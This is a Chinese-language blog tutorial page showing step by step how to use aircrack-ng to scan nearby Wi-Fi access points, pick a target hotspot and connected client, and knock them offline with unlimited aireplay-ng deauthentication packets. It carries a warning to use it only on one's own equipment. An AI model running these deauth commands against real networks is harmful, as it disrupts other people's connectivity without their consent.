<!DOCTYPE html>
<html lang="zh-hant">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    
    <title>中斷無線網路的方法 | 無面者小站</title>
    <meta name="viewport" content="width=device-width,minimum-scale=1">
    <meta name="description" content="警告：此方法只能用於自己的無線網路裝置，目的應該是了解無線網路運作，絕對不能造成他人的困擾或損失，我們應該秉持所有人類都是同胞的心態。就算你">
    <meta name="generator" content="Hugo 0.123.1">
    
    
      
	  <META NAME="ROBOTS" CONTENT="INDEX, FOLLOW">
    

    

  
  
    <link rel="stylesheet" href="/blog/public/ananke/dist/main.css_5c99d70a7725bacd4c701e995b969fea.css" >
  




    
      
<link rel="shortcut icon" href="/avatar2.jpg" type="image/x-icon" />


    

    
    
    <meta property="og:title" content="中斷無線網路的方法" />
<meta property="og:description" content="警告：此方法只能用於自己的無線網路裝置，目的應該是了解無線網路運作，絕對不能造成他人的困擾或損失，我們應該秉持所有人類都是同胞的心態。就算你" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alextrinityblock.github.io/blog/public/post/secure/%E4%B8%AD%E6%96%B7%E7%84%A1%E7%B7%9A%E7%B6%B2%E8%B7%AF%E7%9A%84%E6%96%B9%E6%B3%95/" /><meta property="article:section" content="post" />
<meta property="article:published_time" content="2021-05-03T10:01:49+08:00" />
<meta property="article:modified_time" content="2021-05-03T10:01:49+08:00" />

<meta itemprop="name" content="中斷無線網路的方法">
<meta itemprop="description" content="警告：此方法只能用於自己的無線網路裝置，目的應該是了解無線網路運作，絕對不能造成他人的困擾或損失，我們應該秉持所有人類都是同胞的心態。就算你"><meta itemprop="datePublished" content="2021-05-03T10:01:49+08:00" />
<meta itemprop="dateModified" content="2021-05-03T10:01:49+08:00" />
<meta itemprop="wordCount" content="1133">
<meta itemprop="keywords" content="secure,aircrack,資安,wifi," /><meta name="twitter:card" content="summary"/><meta name="twitter:title" content="中斷無線網路的方法"/>
<meta name="twitter:description" content="警告：此方法只能用於自己的無線網路裝置，目的應該是了解無線網路運作，絕對不能造成他人的困擾或損失，我們應該秉持所有人類都是同胞的心態。就算你"/>

	<meta name="google-site-verification" content="PwYpY_hicXFDwb2NSEpBU7I_8yQDyj8JZMarXbZ_F9Q" />

  </head>

  <body class="ma0 avenir bg-near-white">

    
   
  

  
  
  <header class="cover bg-top" style="background-image: url('https://alextrinityblock.github.io/blog/public/secure.jpg');">
    <div class="pb3-m pb6-l bg-black-60">
      <nav class="pv3 ph3 ph4-ns" role="navigation">
  <div class="flex-l justify-between items-center center">
    <a href="/blog/public/" class="f3 fw2 hover-white no-underline white-90 dib">
      
        無面者小站
      
    </a>
    <div class="flex-l items-center">
      

      
        <ul class="pl0 mr3">
          
          <li class="list f5 f4-ns fw4 dib pr3">
            <a class="hover-white no-underline white-90" href="/blog/public/tags/aws/" title="AWS page">
              AWS
            </a>
          </li>
          
          <li class="list f5 f4-ns fw4 dib pr3">
            <a class="hover-white no-underline white-90" href="/blog/public/tags/azure/" title="Azure page">
              Azure
            </a>
          </li>
          
          <li class="list f5 f4-ns fw4 dib pr3">
            <a class="hover-white no-underline white-90" href="/blog/public/tags/ccna/" title="CCNA page">
              CCNA
            </a>
          </li>
          
          <li class="list f5 f4-ns fw4 dib pr3">
            <a class="hover-white no-underline white-90" href="/blog/public/tags/cicd/" title="CICD page">
              CICD
            </a>
          </li>
          
          <li class="list f5 f4-ns fw4 dib pr3">
            <a class="hover-white no-underline white-90" href="/blog/public/tags/gcp/" title="GCP page">
              GCP
            </a>
          </li>
          
          <li class="list f5 f4-ns fw4 dib pr3">
            <a class="hover-white no-underline white-90" href="/blog/public/tags/git/" title="git page">
              git
            </a>
          </li>
          
          <li class="list f5 f4-ns fw4 dib pr3">
            <a class="hover-white no-underline white-90" href="/blog/public/tags/k8s/" title="K8S page">
              K8S
            </a>
          </li>
          
          <li class="list f5 f4-ns fw4 dib pr3">
            <a class="hover-white no-underline white-90" href="/blog/public/tags/linux" title="linux page">
              linux
            </a>
          </li>
          
          <li class="list f5 f4-ns fw4 dib pr3">
            <a class="hover-white no-underline white-90" href="/blog/public/tags/node.js/" title="Node.js page">
              Node.js
            </a>
          </li>
          
          <li class="list f5 f4-ns fw4 dib pr3">
            <a class="hover-white no-underline white-90" href="/blog/public/tags/secure/" title="secure page">
              secure
            </a>
          </li>
          
          <li class="list f5 f4-ns fw4 dib pr3">
            <a class="hover-white no-underline white-90" href="/blog/public/tags/frontend/" title="網頁前端 page">
              網頁前端
            </a>
          </li>
          
          <li class="list f5 f4-ns fw4 dib pr3">
            <a class="hover-white no-underline white-90" href="/blog/public/tags/" title="更多 page">
              更多
            </a>
          </li>
          
          <li class="list f5 f4-ns fw4 dib pr3">
            <a class="hover-white no-underline white-90" href="/blog/public/post/" title=" page">
              
            </a>
          </li>
          
        </ul>
      
      















    </div>
  </div>
</nav>

      <div class="tc-l pv6 ph3 ph4-ns">
        
          <h1 class="f2 f1-l fw2 white-90 mb0 lh-title">中斷無線網路的方法</h1>
          
        
      </div>
    </div>
  </header>



    <main class="pb7" role="main">
      
  
  <article class="flex-l flex-wrap justify-between mw8 center ph3">
    <header class="mt4 w-100">
      <aside class="instapaper_ignoref b helvetica tracked">
          
        
      </aside>
      




  <div id="sharing" class="mt3">

    
    <a href="https://www.facebook.com/sharer.php?u=https://alextrinityblock.github.io/blog/public/post/secure/%E4%B8%AD%E6%96%B7%E7%84%A1%E7%B7%9A%E7%B6%B2%E8%B7%AF%E7%9A%84%E6%96%B9%E6%B3%95/" class="facebook no-underline" aria-label="share on Facebook">
      <svg height="32px"  style="enable-background:new 0 0 67 67;" version="1.1" viewBox="0 0 67 67" width="32px" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path d="M28.765,50.32h6.744V33.998h4.499l0.596-5.624h-5.095  l0.007-2.816c0-1.466,0.14-2.253,2.244-2.253h2.812V17.68h-4.5c-5.405,0-7.307,2.729-7.307,7.317v3.377h-3.369v5.625h3.369V50.32z   M33,64C16.432,64,3,50.569,3,34S16.432,4,33,4s30,13.431,30,30S49.568,64,33,64z" style="fill-rule:evenodd;clip-rule:evenodd;"/></svg>

    </a>

    
    
    <a href="https://twitter.com/share?url=https://alextrinityblock.github.io/blog/public/post/secure/%E4%B8%AD%E6%96%B7%E7%84%A1%E7%B7%9A%E7%B6%B2%E8%B7%AF%E7%9A%84%E6%96%B9%E6%B3%95/&amp;text=%e4%b8%ad%e6%96%b7%e7%84%a1%e7%b7%9a%e7%b6%b2%e8%b7%af%e7%9a%84%e6%96%b9%e6%b3%95" class="twitter no-underline" aria-label="share on Twitter">
      <svg height="32px"  style="enable-background:new 0 0 67 67;" version="1.1" viewBox="0 0 67 67" width="32px" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path d="M37.167,22.283c-2.619,0.953-4.274,3.411-4.086,6.101  l0.063,1.038l-1.048-0.127c-3.813-0.487-7.145-2.139-9.974-4.915l-1.383-1.377l-0.356,1.017c-0.754,2.267-0.272,4.661,1.299,6.271  c0.838,0.89,0.649,1.017-0.796,0.487c-0.503-0.169-0.943-0.296-0.985-0.233c-0.146,0.149,0.356,2.076,0.754,2.839  c0.545,1.06,1.655,2.097,2.871,2.712l1.027,0.487l-1.215,0.021c-1.173,0-1.215,0.021-1.089,0.467  c0.419,1.377,2.074,2.839,3.918,3.475l1.299,0.444l-1.131,0.678c-1.676,0.976-3.646,1.526-5.616,1.568  C19.775,43.256,19,43.341,19,43.405c0,0.211,2.557,1.397,4.044,1.864c4.463,1.377,9.765,0.783,13.746-1.568  c2.829-1.673,5.657-5,6.978-8.221c0.713-1.716,1.425-4.851,1.425-6.354c0-0.975,0.063-1.102,1.236-2.267  c0.692-0.678,1.341-1.419,1.467-1.631c0.21-0.403,0.188-0.403-0.88-0.043c-1.781,0.636-2.033,0.551-1.152-0.402  c0.649-0.678,1.425-1.907,1.425-2.267c0-0.063-0.314,0.042-0.671,0.233c-0.377,0.212-1.215,0.53-1.844,0.72l-1.131,0.361l-1.027-0.7  c-0.566-0.381-1.361-0.805-1.781-0.932C39.766,21.902,38.131,21.944,37.167,22.283z M33,64C16.432,64,3,50.569,3,34S16.432,4,33,4  s30,13.431,30,30S49.568,64,33,64z" style="fill-rule:evenodd;clip-rule:evenodd;fill:;"/></svg>

    </a>

    
    <a href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https://alextrinityblock.github.io/blog/public/post/secure/%E4%B8%AD%E6%96%B7%E7%84%A1%E7%B7%9A%E7%B6%B2%E8%B7%AF%E7%9A%84%E6%96%B9%E6%B3%95/&amp;title=%e4%b8%ad%e6%96%b7%e7%84%a1%e7%b7%9a%e7%b6%b2%e8%b7%af%e7%9a%84%e6%96%b9%e6%b3%95" class="linkedin no-underline" aria-label="share on LinkedIn">
      <svg  height="32px"  style="enable-background:new 0 0 65 65;" version="1.1" viewBox="0 0 65 65" width="32px" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <path d="M50.837,48.137V36.425c0-6.275-3.35-9.195-7.816-9.195  c-3.604,0-5.219,1.983-6.119,3.374V27.71h-6.79c0.09,1.917,0,20.427,0,20.427h6.79V36.729c0-0.609,0.044-1.219,0.224-1.655  c0.49-1.22,1.607-2.483,3.482-2.483c2.458,0,3.44,1.873,3.44,4.618v10.929H50.837z M22.959,24.922c2.367,0,3.842-1.57,3.842-3.531  c-0.044-2.003-1.475-3.528-3.797-3.528s-3.841,1.524-3.841,3.528c0,1.961,1.474,3.531,3.753,3.531H22.959z M34,64  C17.432,64,4,50.568,4,34C4,17.431,17.432,4,34,4s30,13.431,30,30C64,50.568,50.568,64,34,64z M26.354,48.137V27.71h-6.789v20.427  H26.354z" style="fill-rule:evenodd;clip-rule:evenodd;fill:;"/>
</svg>

    </a>
  </div>


      <h1 class="f1 athelas mt3 mb1">中斷無線網路的方法</h1>
      
      
      <time class="f6 mv4 dib tracked" datetime="2021-05-03T10:01:49+08:00">May 3, 2021</time>

      
      
    </header>
    <div class="nested-copy-line-height lh-copy serif f4 nested-links nested-img mid-gray pr4-l w-two-thirds-l"><h3 id="警告此方法只能用於自己的無線網路裝置目的應該是了解無線網路運作絕對不能造成他人的困擾或損失我們應該秉持所有人類都是同胞的心態就算你的鄰居或同學很令你厭煩也千萬不能將這個用在他身上你唯一能作的就是替他祈禱">警告：此方法只能用於自己的無線網路裝置，目的應該是了解無線網路運作，絕對不能造成他人的困擾或損失，我們應該秉持所有人類都是同胞的心態。就算你的鄰居或同學很令你厭煩，也千萬不能將這個用在他身上，你唯一能作的就是替他祈禱。</h3>
<p>環境建議:<br>
本機安裝的linux<br>
(虛擬機或docker不一定有權限直接操作物理的wifi網路卡）<br>
Ubuntu/Debian/Linux mint</p>
<h2 id="1下載無線網路工具aircrack">1.下載無線網路工具aircrack</h2>
<p>更新軟體庫</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo apt update
</span></span></code></pre></div><p>安裝aircrack-ng軟體</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo apt install aircrack-ng
</span></span></code></pre></div><h2 id="2檢查wifi網路卡名稱">2.檢查wifi網路卡名稱</h2>
<p>找到自己的wifi網路卡名稱</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>iwconfig
</span></span></code></pre></div><p>以我的筆電來說無線網卡的開頭名稱常常是wl<br>
就像這樣(為了安全這裡的數值都更改過，非原數值)</p>
<pre tabindex="0"><code>wlp3s0    IEEE 802.11  ESSID:&#34;alex&#34;  
          Mode:Managed  Frequency:2.462 GHz  Access Point: FF:FF:FF:FF:FF:FF   
          Bit Rate=72.2 Mb/s   Tx-Power=15 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=52/70  Signal level=-58 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:19   Missed beacon:0
</code></pre><p>我的網卡名稱是wlp3s0</p>
<h2 id="3監聽模式">3.監聽模式</h2>
<p>把網卡切換成監聽模式</p>
<pre tabindex="0"><code>sudo airmon-ng start wlp3s0(這裡改成你的網卡名稱)
</code></pre><p>檢查網卡名稱是否變成監聽模式的名稱</p>
<pre tabindex="0"><code>iwconfig
</code></pre><p>來看看我的網卡名稱是否改變</p>
<pre tabindex="0"><code>wlp3s0mon  IEEE 802.11  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=15 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
</code></pre><p>我的網卡名稱變成wlp3s0mon了，成功進入監聽模式</p>
<h2 id="4開始蒐集所有wifi熱點資訊">4.開始蒐集所有wifi熱點資訊</h2>
<p>顯示監聽結果</p>
<pre tabindex="0"><code> sudo airodump-ng wlp3s0mon(你的網卡名稱)
</code></pre><p>我們這時可以看到周遭所有啟動的wifi熱點基地台</p>
<pre tabindex="0"><code> CH  4 ][ Elapsed: 12 s ][ 2021-05-03 11:33 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
                                              
 EE:EE:EE:AA:AA:AA  -72       30        3    0  11  130   WPA2 CCMP   PSK  alice                                                        
 DD:DD:DD:DD:DD:DD  -60       34        0    0  6   65   WPA2 CCMP   PSK  bob 
</code></pre><p>這裡我們可以看到有兩個熱點，看到ESSID那欄，名稱分別是alice跟bob<br>
我們的目標是alice<br>
BSSDID是，這有點類似車牌，可是區分出無線網路中的不同裝置 <br>
alice的熱點的BSSID:</p>
<pre tabindex="0"><code>EE:EE:EE:AA:AA:AA
</code></pre><p>然後這時候看到CH那一欄
alice的CH(頻道)是:</p>
<pre tabindex="0"><code>11
</code></pre><h2 id="5監聽目標wifi熱點">5.監聽目標wifi熱點</h2>
<p>這時候我們可以來看看有誰連上alice的wifi熱點</p>
<pre tabindex="0"><code>sudo airodump-ng --bssid EE:EE:EE:AA:AA:AA --channel 11  wlp3s0mon 
</code></pre><p>監聽到的結果</p>
<pre tabindex="0"><code> CH 11 ][ Elapsed: 8 mins ][ 2021-05-03 11:54 ][ WPA handshake: EE:EE:EE:AA:AA:AA 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 EE:EE:EE:AA:AA:AA  -64 100     1152      332    0  11   65   WPA2 CCMP   PSK  alex                                                   

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 EE:EE:EE:AA:AA:AA  CC:CC:CC:CC:CC:CC  -67    1e- 0e     0      193  EAPOL  alex 
</code></pre><p>注意看底下STATION那個欄位有一個奇怪的MAC位址：</p>
<pre tabindex="0"><code>CC:CC:CC:CC:CC:CC
</code></pre><p>啊！原來有一個人連上了alice的wifi熱點，他的MAC位址是CC:CC:CC:CC:CC:CC<br>
我們幫它取名為Peter吧～<br>
Peter的電腦網卡MAC位置是CC:CC:CC:CC:CC:CC</p>
<h2 id="6中斷無線網路">6.中斷無線網路</h2>
<p>我們現在用下面這條指令中斷Peter的連線</p>
<pre tabindex="0"><code>sudo aireplay-ng --deauth 0 -c CC:CC:CC:CC:CC:CC -a  EE:EE:EE:AA:AA:AA wlp3s0mon
</code></pre><p>加上註解</p>
<pre tabindex="0"><code>sudo aireplay-ng --deauth（中斷登入攻擊） 0（0代表無限次） -c CC:CC:CC:CC:CC:CC（被攻擊者peter的MAC位址） -a  EE:EE:EE:AA:AA:AA（alice的wifif熱點ID） wlp3s0mon(網卡名稱)
</code></pre><p>如果想要中斷所有使用者</p>
<pre tabindex="0"><code>sudo aireplay-ng --deauth 0  -a  EE:EE:EE:AA:AA:AA wlp3s0mon
</code></pre><h2 id="7復原自己的無線網路狀態">7.復原自己的無線網路狀態</h2>
<p>我們測試完畢了，把無線網卡從監聽狀態回復為一般狀態</p>
<pre tabindex="0"><code>sudo  airmon-ng stop  wlp3s0mon
</code></pre><p>不復原網卡你就無法正常上網</p>
<ul class="pa0">
  
   <li class="list">
     <a href="/tags/secure" class="link f5 grow no-underline br-pill ba ph3 pv2 mb2 dib black sans-serif">secure</a>
   </li>
  
   <li class="list">
     <a href="/tags/aircrack" class="link f5 grow no-underline br-pill ba ph3 pv2 mb2 dib black sans-serif">aircrack</a>
   </li>
  
   <li class="list">
     <a href="/tags/%E8%B3%87%E5%AE%89" class="link f5 grow no-underline br-pill ba ph3 pv2 mb2 dib black sans-serif">資安</a>
   </li>
  
   <li class="list">
     <a href="/tags/wifi" class="link f5 grow no-underline br-pill ba ph3 pv2 mb2 dib black sans-serif">wifi</a>
   </li>
  
</ul>
<div class="mt6 instapaper_ignoref">
      
      
      </div>
    </div>

    <aside class="w-30-l mt6-l">




  <div class="bg-light-gray pa3 nested-list-reset nested-copy-line-height nested-links">
    <p class="f5 b mb3">相關內容</p>
    <ul class="pa0 list">
	   
	     <li  class="mb2">
          <a href="/blog/public/post/secure/%E6%AA%A2%E6%9F%A5%E4%B8%8B%E8%BC%89%E6%AA%94%E6%98%AF%E5%90%A6%E8%A2%AB%E8%AA%BF%E5%8C%85/">檢查下載檔是否被調包</a>
        </li>
	    
    </ul>
</div>

</aside>

  </article>

    </main>
    <footer class="mid-gray bottom-0 w-100 pa3" role="contentinfo">
  <div class="flex justify-between">
  <a class="f4 fw4 hover-white no-underline white-70 dn dib-ns pv2 ph3" href="https://alextrinityblock.github.io/blog/public/" >
    &copy;  無面者小站 2025 
  </a>
    <div>














</div>
  </div>
</footer>

  </body>
</html>
